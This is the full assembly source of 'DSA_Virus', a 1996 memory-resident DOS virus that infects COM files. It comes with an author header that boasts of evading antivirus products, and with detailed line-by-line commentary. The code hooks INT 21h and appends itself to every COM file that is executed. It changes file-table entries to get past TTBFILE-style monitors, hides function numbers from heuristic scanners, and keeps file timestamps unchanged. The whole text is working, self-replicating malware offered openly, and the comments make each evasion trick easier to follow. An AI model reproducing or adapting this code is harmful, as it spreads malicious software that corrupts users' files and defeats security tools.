;=====( DSA_Virus by Rajaat )==================================================
;
; Memory resident appending COM infector, residing in the stack space reserved
; for the DOS AH < 0ch calls. Works through TBFILE using SFT manipulation,
; obtained through the DSA. File date/time won't be altered and the virus can
; circumvent attributes. The virus, compiled with TASM, is a mere 263 bytes
; long.
;
;==============================================================================
;
; Virus name : DSA_Virus
; Author : Rajaat
; Origin : United Kingdom, July 1996
; Compiling : Using TASM
;
; TASM /M DSAVIRUS
; TLINK /T DSAVIRUS
; Targets : COM files
; Size : 263 bytes
; Resident : Yes, no decrease in memory reported
; Polymorphic : No
; Encrypted : No
; Stealth : Memory only, by utilizing dos stack space
; Tunneling : Uses SFT to avoid some monitors
; Retrovirus : Yes, uses TbSpoof
; Antiheuristics: Yes
; Peculiarities : Makes extensive use of the Dos Swappable Area (DSA)
; Drawbacks : Might crash, I'm not sure :)
; Behaviour : The first time the DSA virus is executed, it will check if
; it's already resident in memory by looking at the first byte
; in the DOS stack, located in the DSA. If this resembles a
; mov bp,xxxx instruction, it's already resident and the DSA
; virus will return control to the host program. If not, the
; virus will install itself in the DOS stack area, reserved for
; DOS INT 21 functions below 0ch. It will hook INT 21. If a
; program is executed while the DSA virus is resident, it will
; open it in read-only mode. Then it will use the DSA to locate
; the current SFT. In the SFT it modifies the read-only mode to
; read/write, effectively passing the file checks of TBFILE. It
; will also clear the file attributes during the infection
; process by using the SFT. The DSA virus will read the first
; 5 bytes of the file and checks whether the file is already
; infected or if it is an EXE file. If both checks are passed
; successfully, it will write itself at the end of the file
; and patches the start of the COM file to point at its code.
; The infected file increases by 263 bytes. Before closing the
; file, the DSA virus sets the file date/time update flag, so
; the date won't change after infection. After infection it
; will set the file attribute again and return control to its
; caller.
;
; It's unknown what this virus might do besides replicate :)
;==============================================================================
;
; Results with antivirus software
;
; TBFILE - Doesn't detect it
; TBSCAN - Doesn't detect it
; TBMEM - Detects it
; TBCLEAN - Cleans it, so what?
; SVS - Detects it
; SSC - Doesn't detect it
; F-PROT - Doesn't detect it
; F-PROT /ANALYSE - Doesn't detect it
; F-PROT /ANALYSE /PARANOID - Doesn't detect it
; AVP - Detects it
; VSAFE - Corrupts infected files on my system!
; NEMESIS - I don't try this one anymore
;
;==============================================================================
.model tiny
.code
.radix 16 ; NOTE: every unsuffixed numeric literal below is hexadecimal
.286 ; why bother with XT? (presumably also needed for the 'shr ax,4' immediate form in Install_TSR)
org 100
;
; Entry point; also the first byte of the image appended to every host.
; bp receives the file offset at which this copy was appended: the imm16 at
; Relative_Offset is patched in the resident copy before the body is written
; out (see Check_Infect), so every label is addressed as Label[bp].
; In:  COM entry state; top of stack = the word present at COM entry
; Out: never returns here; falls through to Install_TSR or Return_to_host
;
DSA_Virus: mov bp,0 ; delta offset (opcode 0BDh = 'mov bp,imm16'; that byte is reused as the residency marker below)
Relative_Offset equ $-2 ; address of the imm16 above, rewritten on each infection
mov ax,5d06 ; get DSA pointer (INT 21h AX=5D06h -> ds:si = DOS Swappable Data Area)
int 21 ;
cmp byte ptr [si+600],0bdh ; mov bp in stack memory? (DSA+600h is where Install_TSR places offset 100h of the
                            ; resident copy, so finding our first opcode there means "already resident")
jne Install_TSR ; no, install virus
;=====( Return to host )=======================================================
;
; Put the host's original first 5 bytes back at cs:100h and run the host.
; In:  bp = delta offset; top of stack = the word present at COM entry
; Out: does not return; control reaches the restored host code at cs:100h
; Clobbers: ax, si, di, ds, es
;
Return_to_host: push cs cs ; move 5 bytes to offset 100h
pop ds es ; and execute host (ds = es = cs)
lea si,COM_Host[bp] ; source: the 5 host bytes carried inside the virus body
pop ax ; drop the word found on the stack at COM entry (presumably the 0000 DOS pushes)
mov di,0ff
stosb ; al lands at cs:00FFh only as a side effect; the purpose is di = 100h afterwards
push di ; the final ret pops 100h and so lands on the restored host code
movsw ; copy the 5 saved bytes over the 'PK'/jmp patch at cs:100h
movsw
movsb
ret ; 'ret' to cs:100h = start the original host
;=====( Install virus in memory )==============================================
;
; Copy the virus into the DOS stack area inside the DSA and hook INT 21h.
; In:  si = DSA offset and ds = DSA segment (from the AX=5D06h call), bp = delta
; Out: jumps to Return_to_host; INT 21h now points at New_21 in the DSA-based
;      segment, the previous vector is saved at INT_21
; Clobbers: ax, bx, cx, dx, si, di, ds, es
; No memory is allocated (header: "no decrease in memory reported"); the
; INT 21h vector ending up inside DOS's own data area is presumably what a
; memory scanner such as TBMEM (header) keys on.
;
Install_TSR: xchg ax,si ; ax = DSA offset (si takes the old ax, unused)
test al,0f ; DSA at paragraph boundary? (segment arithmetic below assumes DSA offset = 16n)
jnz Return_to_host ; no, abort (stays non-resident; host still runs)
add ah,5 ; DSA+600 = DOS stack for   | segment = ds + (DSA_off + 500h) / 16,
shr ax,4 ; ah < 0ch, virus re-aligns  | so that offset 100h in that segment
mov bx,ds ; segment, so offset is     | is DSA+600h
add ax,bx ; 100, like in COM files
push cs
pop ds ; ds = current (host) segment, source of the copy
mov es,ax ; es = DSA-based segment, destination
lea si,DSA_Virus[bp]
mov di,100
mov cx,Virus_Length ; whole image (header: 263 bytes); INT_21 is not part of it
Move_Virus: lodsb
stosb
loop Move_Virus ; move virus to stack space (es:100h = DSA+600h)
push es
pop ds ; ds = resident copy; INT_21 and New_21 below are addressed in it
mov ax,4521 ; get int 21 (4521h - 1000h = 3521h: AH=35h get vector, AL=21h;
sub ah,10 ; the literal 3521h never appears in the code - cf. 'Antiheuristics' in header)
int 21 ; es:bx = current INT 21h handler
mov word ptr INT_21,bx
mov word ptr INT_21+2,es ; this far pointer is the operand of the 0EAh at Int_21_Done
mov ah,25 ; set int 21 (AH=25h, AL still 21h)
lea dx,New_21 ; ds:dx = New_21 inside the resident copy
int 21
jmp Return_to_host ; restore host
;=====( Data to place at the start of a COM file )=============================
Signature db '[DSA by Rajaat / Genesis]' ; text carried in every infected file; not referenced by any instruction
Virus_Jump: db 'PK' ; TbSpoof (ZIP-archive magic at file offset 0; also the infection marker tested in Check_Infect,
                    ; so infected COM files start with the bytes 50 4B E9 - a static indicator, since the
                    ; timestamp is deliberately left unchanged)
db 0e9 ; jump to virus (near 'jmp rel16'; at write time its displacement is the first word of COM_Host)
;=====( First 5 bytes of host data )===========================================
COM_Host db 0cdh,020h,0,0,0 ; host's original first 5 bytes (default: int 20h, exit); the 5 bytes from
                            ; Virus_Jump through COM_Host+1 are what Check_Infect writes at file offset 0
;=====( Resident INT 21 handler )==============================================
;
; Resident INT 21h handler. Only AX=4B00h (EXEC: load and execute) is
; intercepted; everything else is chained to the saved vector at Int_21_Done.
; In:  ax = DOS function, ds:dx = path of the program being executed
; Out: all registers as on entry, then a far jump to the original handler;
;      the file at ds:dx has been infected before DOS loads it
;
New_21: not ax
cmp ax,not 4b00 ; execute file? (compared on complemented values so the literal 4B00h is absent from the code)
not ax
jne Int_21_Done ; no, abort
Check_Infect: push ax bx dx ds es
mov ah,3dh ; open read-only (al = 00h from AX=4B00h; ds:dx = the path passed to EXEC)
int 21 ; no carry check: on failure the error code in ax is used as the handle below (cf. 'Drawbacks' in header)
xchg ax,bx ; bx = file handle
mov ax,5d06 ; get DSA (ds:si = DSA)
int 21
lds si,dword ptr ds:[si+27e] ; get current SFT (DSA+27Eh = far pointer to the SFT entry of the file just opened)
push si ds ; SFT pointer, restored at Is_Infected
mov word ptr [si+2],2 ; open mode is now read/write (the open itself was read-only; the mode is flipped behind the API, which is the TBFILE bypass described in the header)
mov al,byte ptr [si+4] ; get file attribute
mov byte ptr [si+4],0 ; clear file attribute (so a read-only/hidden/system attribute does not block the write)
push ax ; push file attribute on stack (only al matters; restored at Is_Infected)
push cs
pop ds ; ds = resident virus segment for the buffers below
mov ah,3f ; read first 5 bytes of host
mov cx,5
lea dx,COM_Host ; into the resident copy, so the body written out below carries them
int 21
mov ax,word ptr [Com_Host]
sub ax,'KP' ; PK signature? (word 'KP' = bytes 'P','K' in memory order)
jz is_infected ; yes, abort (any file that genuinely starts with 'PK' is skipped too)
sub ax,'ZM'-'KP' ; MZ signature (EXE file) (second subtraction, so the net test is against the original word)
jz is_infected ; yes, abort
mov ax,4202 ; goto end of file
xor cx,cx
cwd ; dx = 0 (sign-extension of the positive ax); cx:dx = offset 0 from end
int 21 ; dx:ax = file size
mov word ptr Relative_Offset,ax ; store relative offset (patches 'mov bp,imm16' in the resident copy before it is written out)
push ax
mov ah,1 ; write virus at end of file
shl ah,6 ; ah = 40h (write), built arithmetically as with 4521h in Install_TSR
mov cx,Virus_Length
lea dx,DSA_Virus
int 21
mov ax,4200 ; goto start of file
xor cx,cx
cwd
int 21
pop ax ; calculate jump address
mov cx,5
sub ax,cx ; rel16 = old_size - 5: the jmp sits at file offset 2, next ip is 5, target = old_size = the appended body; cx = 5 is reused as the write length
mov word ptr Com_Host,ax
mov ah,40 ; write jump at start of file ('P','K',E9h,rel16 = 5 bytes from Virus_Jump)
lea dx,Virus_Jump
int 21
Is_Infected: pop ax ds si ; al = saved attribute, ds:si = SFT entry
mov byte ptr [si+4],al ; restore file attributes
or byte ptr [si+6],40 ; don't change file date/time (SFT flag bit 40h, so the timestamp does not reveal the infection)
mov ah,3e ; close file (bx = handle)
int 21
pop es ds dx bx ax
Int_21_Done: db 0ea ; chain to old int 21 (opcode of 'jmp far'; its operand is the INT_21 dword that follows directly)
Virus_Length equ $-DSA_Virus ; size of the image appended to hosts (header: 263 bytes); everything after this is not written to files
;=====( Data used by the virus, but not written to files )=====================
INT_21 dd 0 ; saved original INT 21h vector; filled in by Install_TSR in the resident copy and
            ; doubles as the far-pointer operand of the 0EAh byte at Int_21_Done
end DSA_Virus